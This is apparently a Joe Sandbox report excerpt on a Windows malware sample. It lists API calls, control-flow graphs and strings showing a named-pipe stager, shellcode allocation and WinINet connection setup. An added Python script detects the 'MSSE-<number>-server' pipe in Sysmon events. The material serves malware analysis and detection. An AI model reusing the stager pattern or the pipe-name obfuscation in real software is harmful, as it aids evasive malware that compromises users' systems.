                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                                            • String ID:
                                            • API String ID: 2239253087-0
                                            • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                                            • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                                            • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                                            • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

                                            Control-flow Graph

                                            APIs
                                            • malloc.MSVCRT ref: 004017B9
                                            • SleepEx.KERNELBASE ref: 004017CD
                                              • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                                              • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                                              • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                                            • GetTickCount.KERNEL32 ref: 004017FC
                                            • CreateThread.KERNEL32 ref: 00401885
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                                            • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                                            • API String ID: 3660650057-1020837823
                                            • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                                            • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                                            • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                                            • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08
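                                            The two functions above describe the sample's named-pipe stager: the function at 401630 creates the pipe (CreateNamedPipeA, ConnectNamedPipe, WriteFile, CloseHandle) and its caller builds the pipe name from the format string `%c%c%c%c%c%c%c%c%cMSSE-%d-server`. The nine `%c` slots spell the `\\.\pipe\` prefix one character at a time (the lone `\`, `.`, `p`, `i`, `e` entries in the String ID are those characters), so the full path `\\.\pipe\MSSE-<number>-server` never exists as one contiguous string in the binary and only appears at runtime. The following is an added detection example, not code from the Joe Sandbox report or from the sample: it reconstructs the runtime pipe name the same way and matches constructed, Sysmon-style pipe events (Event ID 17 PipeCreated, 18 PipeConnected) against it. The key=value log layout and the sample events are assumptions made for the example.

```python
import re
from typing import Dict, List

# Sysmon records PipeName without the "\\.\pipe" device prefix (e.g. "\MSSE-4523-server"),
# while API-level traces show the full "\\.\pipe\MSSE-4523-server". Accept both spellings.
MSSE_PIPE_RE = re.compile(r"^(?:\\\\\.\\pipe)?\\MSSE-\d+-server$", re.IGNORECASE)

# Constructed sample events (assumption: one event per line, space-separated key=value).
SAMPLE_EVENTS: List[str] = r"""
EventID=17 PipeName=\MSSE-4523-server Image=C:\Users\victim\Downloads\A1E0xfcSNl.exe
EventID=18 PipeName=\MSSE-4523-server Image=C:\Users\victim\Downloads\A1E0xfcSNl.exe
EventID=17 PipeName=\lsass Image=C:\Windows\System32\lsass.exe
EventID=17 PipeName=\\.\pipe\MSSE-77-server Image=C:\temp\x.exe
EventID=17 PipeName=\MSSE-abc-server Image=C:\temp\y.exe
""".strip().splitlines()


def expected_pipe_name(n: int) -> str:
    """Rebuild the name the sample formats at runtime: nine single characters
    that spell \\.\pipe\ followed by MSSE-<n>-server."""
    prefix_chars = ["\\", "\\", ".", "\\", "p", "i", "p", "e", "\\"]
    return "".join(prefix_chars) + f"MSSE-{n}-server"


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value event line into a dict (values carry no spaces here)."""
    return dict(tok.split("=", 1) for tok in line.split())


def find_msse_pipes(lines: List[str]) -> List[Dict[str, str]]:
    """Return pipe-created / pipe-connected events whose name matches the
    MSSE-<number>-server pattern, with or without the \\.\pipe\ prefix."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") in ("17", "18") and MSSE_PIPE_RE.match(ev.get("PipeName", "")):
            hits.append(ev)
    return hits


if __name__ == "__main__":
    print("runtime pipe name for %d=4523:", expected_pipe_name(4523))
    for ev in find_msse_pipes(SAMPLE_EVENTS):
        print("MSSE stager pipe:", ev["EventID"], ev["PipeName"], ev["Image"])
```

Because the prefix is assembled from single characters, a static string scan for `\\.\pipe\MSSE` will miss this sample; the reliable place to catch the pattern is pipe telemetry (Sysmon 17/18 or equivalent) or a memory dump taken after the format call, which is where the Joe Sandbox string list above was recovered from.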

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 007CE0FC: RevertToSelf.ADVAPI32 ref: 007CE10A
                                            • InternetOpenA.WININET ref: 007BEB0C
                                            • InternetSetOptionA.WININET ref: 007BEB2C
                                            • InternetSetOptionA.WININET ref: 007BEB44
                                            • InternetConnectA.WININET ref: 007BEB7A
                                            • InternetSetOptionA.WININET ref: 007BEBB7
                                            • InternetSetOptionA.WININET ref: 007BEBE2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$Option$ConnectOpenRevertSelf
                                            • String ID:
                                            • API String ID: 1513466045-0
                                            • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                            • Instruction ID: 367597635c703493c40462a2034accf43f7e8a535a2f5be997ce62af9637b4b0
                                            • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                            • Instruction Fuzzy Hash: A341D275A08BC282EB18DF51E499BBA7765F798B84F04402DEA4E17B26CF7CE516C700

                                            Control-flow Graph

                                            control_flow_graph 228 7bca74-7bcbd6 call 7c5fec call 7c61e8 * 3 call 7cb454 call 7cb464 * 2 call 7cb434 * 2 call 7cb454 * 2 call 7cf284 call 7cb434 * 3 call 7cb464 call 7cc230 call 7c34a0 call 7ceaa8 * 2 call 7bf3c0 271 7bcbd8 call 7cda74 228->271 272 7bcbdd-7bcbf2 call 7cb434 call 7bf1e4 228->272 271->272 278 7bcbf9-7bcc07 call 7bf1f8 272->278 279 7bcbf4 call 7cda74 272->279 283 7bcc09 call 7cda74 278->283 284 7bcc0e-7bcc15 call 7bf274 278->284 279->278 283->284 288 7bcc1c-7bcc55 call 7cb464 call 7cb434 call 7cf284 284->288 289 7bcc17 call 7cda74 284->289 297 7bcc5c-7bcc90 call 7cb434 call 7ceaa8 call 7cb434 call 7c5c60 288->297 298 7bcc57 call 7cda74 288->298 289->288 308 7bcebb-7bcee7 call 7cc218 call 7cf244 call 7cda74 297->308 309 7bcc96-7bcc9d 297->309 298->297 310 7bcca2-7bcd24 call 7cbfc0 call 7cf63c call 7cbfc0 call 7cf63c * 2 call 7c2ee0 309->310 329 7bcd26-7bcd2a 310->329 330 7bcd44-7bcd77 call 7bea48 call 7cb434 call 7be9f4 310->330 332 7bcd2e-7bcd35 329->332 341 7bcd79-7bcd87 call 7cad44 330->341 342 7bcd9c-7bcd9f 330->342 332->332 334 7bcd37-7bcd3a 332->334 334->330 335 7bcd3c-7bcd3f call 7c31f4 334->335 335->330 351 7bcd89-7bcd93 call 7c8e0c 341->351 352 7bcd95-7bcd98 341->352 343 7bce26 342->343 344 7bcda5-7bcdc8 call 7c6b98 call 7cb434 342->344 347 7bce2c-7bce38 call 7be9c8 call 7bf3c0 343->347 359 7bcdca 344->359 360 7bcdcf-7bcdf0 call 7c18c4 call 7c5144 call 7c4a04 call 7bf3c0 344->360 362 7bce3a call 7cda74 347->362 363 7bce3f-7bce5d call 7cbf04 347->363 351->342 352->342 359->360 387 7bcdfa-7bce01 360->387 388 7bcdf2-7bcdf5 call 7bf484 360->388 362->363 370 7bce5f call 7cda74 363->370 371 7bce64-7bce6c 363->371 370->371 371->308 374 7bce6e-7bce76 371->374 376 7bce78-7bce89 374->376 377 7bcea4 call 7c211c 374->377 380 7bce8b-7bce9a call 7bf3a0 376->380 381 7bce9c 376->381 383 7bcea9-7bceb5 377->383 385 7bce9e-7bcea0 380->385 381->385 383->308 383->310 385->377 390 7bcea2 385->390 387->347 392 7bce03-7bce24 call 7be9c8 call 7bea48 call 7bec04 387->392 388->387 390->377 392->347
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                            • malloc.LIBCMT ref: 007BCB3B
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                              • Part of subcall function 007CC230: _time64.LIBCMT ref: 007CC254
                                              • Part of subcall function 007CC230: malloc.LIBCMT ref: 007CC29C
                                              • Part of subcall function 007CC230: strtok.LIBCMT ref: 007CC300
                                              • Part of subcall function 007CC230: strtok.LIBCMT ref: 007CC311
                                              • Part of subcall function 007C34A0: _time64.LIBCMT ref: 007C34AE
                                              • Part of subcall function 007CEAA8: malloc.LIBCMT ref: 007CEAF8
                                              • Part of subcall function 007CEAA8: realloc.LIBCMT ref: 007CEB07
                                              • Part of subcall function 007BF3C0: GetLocalTime.KERNEL32 ref: 007BF3DF
                                            • malloc.LIBCMT ref: 007BCC4A
                                            • _snprintf.LIBCMT ref: 007BCCC1
                                            • _snprintf.LIBCMT ref: 007BCCE7
                                            • free.LIBCMT ref: 007BCEC6
                                              • Part of subcall function 007CAD44: malloc.LIBCMT ref: 007CAD78
                                              • Part of subcall function 007CAD44: free.LIBCMT ref: 007CAF2F
                                              • Part of subcall function 007C8E0C: htonl.WS2_32 ref: 007C8E3D
                                              • Part of subcall function 007C8E0C: htonl.WS2_32 ref: 007C8E4A
                                            • _snprintf.LIBCMT ref: 007BCD0E
                                              • Part of subcall function 007CDA74: Sleep.KERNEL32 ref: 007CDABC
                                              • Part of subcall function 007CDA74: ExitThread.KERNEL32 ref: 007CDAC6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                                            • String ID:
                                            • API String ID: 548016584-0
                                            • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                            • Instruction ID: d82d2695ff827594a388b677fa54f0363f13a7a491a421e530cbfe0e72ebe583
                                            • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                            • Instruction Fuzzy Hash: 4EA1B161704681C6DB18FB72A85ABAE6395BB85780F44813CFE5A4B797DF3CD90AC700

                                            Control-flow Graph

                                            control_flow_graph 406 7bf014-7bf04f call 7bf118 WSASocketA 409 7bf058-7bf097 WSAIoctl 406->409 410 7bf051-7bf053 406->410 412 7bf099-7bf0b0 409->412 413 7bf0b4-7bf0be 409->413 411 7bf0f6-7bf10a 410->411 412->413 414 7bf0eb-7bf0ee call 7e25e8 413->414 415 7bf0c0 413->415 420 7bf0f4 414->420 416 7bf0c5-7bf0cf 415->416 418 7bf0d1-7bf0d4 416->418 419 7bf0d6-7bf0e2 416->419 418->419 421 7bf0e6 418->421 419->414 422 7bf0e4 419->422 420->411 421->414 422->416
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: IoctlSocketStartupclosesocket
                                            • String ID:
                                            • API String ID: 365704328-0
                                            • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                            • Instruction ID: 0374cae734d916fdc1254a4c9a90b94c71797175e4d7ea6f4616b483c680d9d9
                                            • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                            • Instruction Fuzzy Hash: DB2190727087C482D7209F24F98079AB7A5F388BE4F548635EE9D43B9ADB3DC5468B00

                                            Control-flow Graph

                                            control_flow_graph 423 401595-4015c5 VirtualAlloc 424 4015c7-4015c9 423->424 425 4015e0-40162c call 401563 VirtualProtect CreateThread 424->425 426 4015cb-4015de 424->426 426->424
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocCreateProtectThread
                                            • String ID:
                                            • API String ID: 3039780055-0
                                            • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                                            • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                                            • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                                            • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

                                            Control-flow Graph

                                            control_flow_graph 429 401704-40175c CreateFileA 430 40179c-4017a5 429->430 431 40175e-401760 429->431 432 401781-40178f CloseHandle 431->432 433 401762-40177f ReadFile 431->433 432->430 433->432 434 401791-40179a 433->434 434->431
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleRead
                                            • String ID:
                                            • API String ID: 1035965006-0
                                            • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                                            • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                                            • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                                            • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

                                            Control-flow Graph

                                            control_flow_graph 435 7bf118-7bf12a 436 7bf14e-7bf150 435->436 437 7bf12c-7bf136 call 7e25e0 435->437 439 7bf1c9-7bf1d1 436->439 440 7bf152-7bf159 436->440 441 7bf13c-7bf13e 437->441 440->439 442 7bf15b-7bf1c2 call 7cb434 * 2 call 7cb454 * 4 440->442 443 7bf1d2-7bf1e3 call 7e25d8 call 7d0414 441->443 444 7bf144 441->444 442->439 444->436
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CleanupStartup
                                            • String ID:
                                            • API String ID: 915672949-0
                                            • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                            • Instruction ID: f0195e954e0522f338b0534480a0260b47b8433e74e48b366ae4097bea6f68a3
                                            • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                            • Instruction Fuzzy Hash: 33111B34A09BCAC6FB18AB60E89E7753295A744304F40043EA7590B3A7DF7D955AC710

                                             Control-flow Graph (basic blocks and edges; executed/not-executed colouring not preserved in text): 461 7796b4-77971e 462 779723-77972c 461->462 463 779732-7797b6 call 778b64 LoadLibraryA 462->463 464 77994f-779963 462->464 467 7797bb-7797c4 463->467 468 77993c-77994a 467->468 469 7797ca-7797d0 467->469 468->462 470 7797d6-7797ee 469->470 471 7798a9-779910 call 778b64 469->471 470->471 473 7797f4-7798a7 470->473 475 779913-779927 471->475 473->475 476 779937 475->476 477 779929-779932 475->477 476->467 477->476
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                            • Instruction ID: 80fc3bfd8db56dd963d6a11f248bb7b1478906e3db73c4bf58452df2344de59e
                                            • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                            • Instruction Fuzzy Hash: 9C618736219B8486CAA0CB0AE49035AB7A0F7C9BD4F548525EFCE83B28DF3DD555CB00

                                             Control-flow Graph (basic blocks and edges; executed/not-executed colouring not preserved in text): 479 403040-403051 call 401950 call 4017f8 484 403058-40305f SleepEx 479->484 484->484
                                            APIs
                                              • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                                              • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                                              • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                                              • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                                            • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: Sleep$CountCreateThreadTickmalloc
                                            • String ID:
                                            • API String ID: 345437100-0
                                            • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                                            • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                                            • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                                            • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E

                                             Control-flow Graph (basic blocks and edges; executed/not-executed colouring not preserved in text): 485 779324-779358 486 77935e-779374 485->486 487 77944d-779453 485->487 486->487 491 77937a-7793c2 486->491 488 779455-779474 VirtualAlloc 487->488 489 779479-779482 487->489 488->489 493 7793ce-7793d4 491->493 494 7793d6-7793de 493->494 495 779402-779408 493->495 494->495 496 7793e0-7793e6 494->496 495->487 497 77940a-779445 495->497 496->495 498 7793e8-779400 496->498 497->487 498->493
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                            • Instruction ID: 4791e37a8243ef4ad6fa33bdd1df1e05d1a204ebf9b3b6baf2f6c50dafcfa5d0
                                            • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                            • Instruction Fuzzy Hash: 51419872629B8487DB60CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                            • String ID: U
                                            • API String ID: 3902385426-4171548499
                                            • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                            • Instruction ID: 26966987b1598435038897b711ad23b88366276bf7d36189688b7ba22b31564d
                                            • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                            • Instruction Fuzzy Hash: 34021572718A8186DB20CF29D48436EB775F784B48F544117EB8A83B69EF3DD885CB10
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 007C8FA0
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 007C8FD9
                                            • Process32First.KERNEL32 ref: 007C8FFB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                                            • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                            • API String ID: 718051232-1833344708
                                            • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                            • Instruction ID: 8c3fd52bde66b895fd8ca30966c70a0a7edf25c1db970a2b079e337e919dba9d
                                            • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                            • Instruction Fuzzy Hash: 8672E921F05641C2DAB8DB269855F7523D1B789BC0FA4412EDE0E87B59EF3CCA86C742
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007D2FFD
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007D3002
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _fileno.LIBCMT ref: 007D302F
                                              • Part of subcall function 007D5A54: _errno.LIBCMT ref: 007D5A5D
                                              • Part of subcall function 007D5A54: _invalid_parameter_noinfo.LIBCMT ref: 007D5A68
                                            • write_multi_char.LIBCMT ref: 007D366B
                                            • write_string.LIBCMT ref: 007D3688
                                            • write_multi_char.LIBCMT ref: 007D36A5
                                            • write_string.LIBCMT ref: 007D3704
                                            • write_string.LIBCMT ref: 007D373B
                                            • write_multi_char.LIBCMT ref: 007D375D
                                            • free.LIBCMT ref: 007D3771
                                            • _isleadbyte_l.LIBCMT ref: 007D3842
                                            • write_char.LIBCMT ref: 007D3858
                                            • write_char.LIBCMT ref: 007D3879
                                            • _errno.LIBCMT ref: 007D397C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007D3987
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                            • String ID: $@
                                            • API String ID: 3318157856-1077428164
                                            • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                            • Instruction ID: ce72dc874b0c585469fe89773937ba08d5a40a6539e3c78d940b43a4dea52ae6
                                            • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                            • Instruction Fuzzy Hash: 214223B2608A8486EB25CB29D54437E7BB0F7417A4F281117DE4A57BA8DB7CDB41CB03
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007D2589
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007D258E
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _fileno.LIBCMT ref: 007D25BB
                                              • Part of subcall function 007D5A54: _errno.LIBCMT ref: 007D5A5D
                                              • Part of subcall function 007D5A54: _invalid_parameter_noinfo.LIBCMT ref: 007D5A68
                                            • write_multi_char.LIBCMT ref: 007D2BEB
                                            • write_string.LIBCMT ref: 007D2C08
                                            • write_multi_char.LIBCMT ref: 007D2C25
                                            • write_string.LIBCMT ref: 007D2C84
                                            • write_string.LIBCMT ref: 007D2CBB
                                            • write_multi_char.LIBCMT ref: 007D2CDD
                                            • free.LIBCMT ref: 007D2CF1
                                            • _isleadbyte_l.LIBCMT ref: 007D2DC2
                                            • write_char.LIBCMT ref: 007D2DD8
                                            • write_char.LIBCMT ref: 007D2DF9
                                            • _errno.LIBCMT ref: 007D2EF3
